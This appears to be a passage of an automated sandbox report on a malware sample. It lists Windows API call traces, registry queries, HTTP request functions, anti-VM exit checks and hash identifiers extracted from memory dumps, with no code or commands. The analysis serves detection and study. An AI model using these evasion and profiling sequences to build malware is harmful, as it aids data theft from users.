                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                        • wsprintfA.USER32 ref: 00418459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • RegQueryValueExA.ADVAPI32(00000000,00860358,00000000,000F003F,?,00000400), ref: 004184EC
                                        • lstrlenA.KERNEL32(?), ref: 00418501
                                        • RegQueryValueExA.ADVAPI32(00000000,008603E8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                        • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                        • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                        • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1683549937-4251816714
                                        • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                        • Instruction ID: a8d43c492d7d6147a6ac3b4b495328721cac0bdb4fda7375b645000892042c31
                                        • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                        • Instruction Fuzzy Hash: F5215BB5D00219ABDF10DFA4EC48AEDBB75FF04320F008225F929A7290EB706A05CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F790B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F7912
                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022F7944
                                        • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022F7965
                                        • RegCloseKey.ADVAPI32(00000000), ref: 022F796F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                        • Instruction ID: 87d877fa59fbaa6c8ea20321ce2aa53ff228c707c175ba53dda5d6953ad90a4f
                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                        • Instruction Fuzzy Hash: 49012CB9A80209BBEB10DBE0DD49FADB7B9EB48701F005164BA0596284D6749900CF51
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                        • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                        • RegOpenKeyExA.ADVAPI32(80000002,0085CF40,00000000,00020119,00000000), ref: 004176DD
                                        • RegQueryValueExA.ADVAPI32(00000000,00860388,00000000,00000000,?,000000FF), ref: 004176FE
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3466090806-2517555085
                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                        • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                        • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                        • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                        • RegOpenKeyExA.ADVAPI32(80000002,0085CF40,00000000,00020119,004176B9), ref: 0041775B
                                        • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                        • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3466090806-1022791448
                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                        • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                        • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                        APIs
                                        • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                        • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                        • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID: :A$:A
                                        • API String ID: 1378416451-1974578005
                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                        • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                        • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                                        • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                                        • HeapFree.KERNEL32(00000000), ref: 022E76C0
                                          • Part of subcall function 022E94A7: vsprintf_s.MSVCRT ref: 022E94C2
                                        • task.LIBCPMTD ref: 022E77BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                        • String ID:
                                        • API String ID: 700816787-0
                                        • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                        • Instruction ID: 016dc93e85b805816bedacee705b5acf0006b569dc39df1aa97c86f7f1d92936
                                        • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                        • Instruction Fuzzy Hash: 26613DB591026C9BDF24DB90CC41FE9B7B9BF44300F4081E9E68AA6144EBB05BC5DF91
                                        APIs
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                                          • Part of subcall function 022E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                                          • Part of subcall function 022E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                                          • Part of subcall function 022E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                                          • Part of subcall function 022E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                                          • Part of subcall function 022E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                                        • lstrlen.KERNEL32(00000000), ref: 022F5596
                                          • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                                        • lstrlen.KERNEL32(00000000), ref: 022F55EA
                                        • strtok.MSVCRT(00000000,?), ref: 022F5605
                                        • lstrlen.KERNEL32(00000000), ref: 022F5615
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                        • String ID:
                                        • API String ID: 3532888709-0
                                        • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                        • Instruction ID: 2e94e57ee7bd006ace08b5aa9786c55100ad72b271a6cd4957ed0b52d2c8f3bc
                                        • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                        • Instruction Fuzzy Hash: 8651BB715203489BCB68EFE4DEA5AEDB776AF10301F904038EA0A66694DB346B49CF51
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022F7345
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,022F7574,004205BD), ref: 022F7383
                                        • memset.MSVCRT ref: 022F73D1
                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022F7525
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: OpenProcesslstrcpymemset
                                        • String ID:
                                        • API String ID: 224852652-0
                                        • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                        • Instruction ID: ec03d3f3d8c1cbde2bd9eca07fd8be41c342852b5703ea6fe1a482844a79d522
                                        • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                        • Instruction Fuzzy Hash: 56518FB1C203199BDBA4DBE4DC84BEDF775AF44305F5040B8E609A7284DB746A88CF58
                                        APIs
                                        • memset.MSVCRT ref: 022F433C
                                        • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022F435B
                                        • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022F437F
                                        • RegCloseKey.ADVAPI32(?), ref: 022F4389
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F43AE
                                        • lstrcat.KERNEL32(?,0064A168), ref: 022F43C2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                        • String ID:
                                        • API String ID: 2623679115-0
                                        • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                        • Instruction ID: 416fecc4e2f557640287aa9c71e1c30ad43fa06f8c2e7e63c33b1aa53bcb34a7
                                        • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                        • Instruction Fuzzy Hash: E041C7B69502087BDB14FBE0DC46FEF733AAB49700F004558A71957184EAB55A98CFE1
                                        APIs
                                        • memset.MSVCRT ref: 004140D5
                                        • RegOpenKeyExA.ADVAPI32(80000001,00860910,00000000,00020119,?), ref: 004140F4
                                        • RegQueryValueExA.ADVAPI32(?,00861000,00000000,00000000,00000000,000000FF), ref: 00414118
                                        • RegCloseKey.ADVAPI32(?), ref: 00414122
                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                        • lstrcatA.KERNEL32(?,00860F58), ref: 0041415B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                        • String ID:
                                        • API String ID: 2623679115-0
                                        • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                        • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                        • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                        • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                        APIs
                                        • strtok_s.MSVCRT ref: 00413588
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • strtok_s.MSVCRT ref: 004136D1
                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0085A0F8,?,0042110C,?,00000000), ref: 0041A82B
                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpystrtok_s$lstrlen
                                        • String ID:
                                        • API String ID: 3184129880-0
                                        • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                        • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                        • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                        • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                        APIs
                                        • __lock.LIBCMT ref: 0041B39A
                                          • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                          • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                          • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                                        • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                                          • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                        • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2005412495-0
                                        • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                        • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                                        • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                        • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                        APIs
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022F9B51
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022F9B9A
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022F9BCB
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022F9BFC
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                                          • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022E1437: ExitProcess.KERNEL32 ref: 022E1478
                                          • Part of subcall function 022E13C7: GetSystemInfo.KERNEL32(?), ref: 022E13D1
                                          • Part of subcall function 022E13C7: ExitProcess.KERNEL32 ref: 022E13E5
                                          • Part of subcall function 022E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022E1392
                                          • Part of subcall function 022E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022E1399
                                          • Part of subcall function 022E1377: ExitProcess.KERNEL32 ref: 022E13AA
                                          • Part of subcall function 022E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                                          • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14BF
                                          • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14CD
                                          • Part of subcall function 022E1487: ExitProcess.KERNEL32 ref: 022E14FB
                                          • Part of subcall function 022F69D7: GetUserDefaultLangID.KERNEL32 ref: 022F69DB
                                          • Part of subcall function 022E13F7: ExitProcess.KERNEL32 ref: 022E142D
                                          • Part of subcall function 022F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022E141E), ref: 022F7AE7
                                          • Part of subcall function 022F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F7AEE
                                          • Part of subcall function 022F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022F7B06
                                          • Part of subcall function 022F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F7B77
                                          • Part of subcall function 022F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022F7B7E
                                          • Part of subcall function 022F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022F7B96
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                                        • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                                        • Sleep.KERNEL32(00001770), ref: 022F6D6B
                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                                        • ExitProcess.KERNEL32 ref: 022F6D89
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                        • Instruction ID: 417c4337a14bd03aa24b9d96b69d9c7b9ca1aa6d988d8f6a3b71d8e46c256cfb
                                        • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                        • Instruction Fuzzy Hash: 8A312876A60308AADB84FBF0DC55BFDF37AAF14300F504538A616A6298EF745A44CE61
                                        APIs
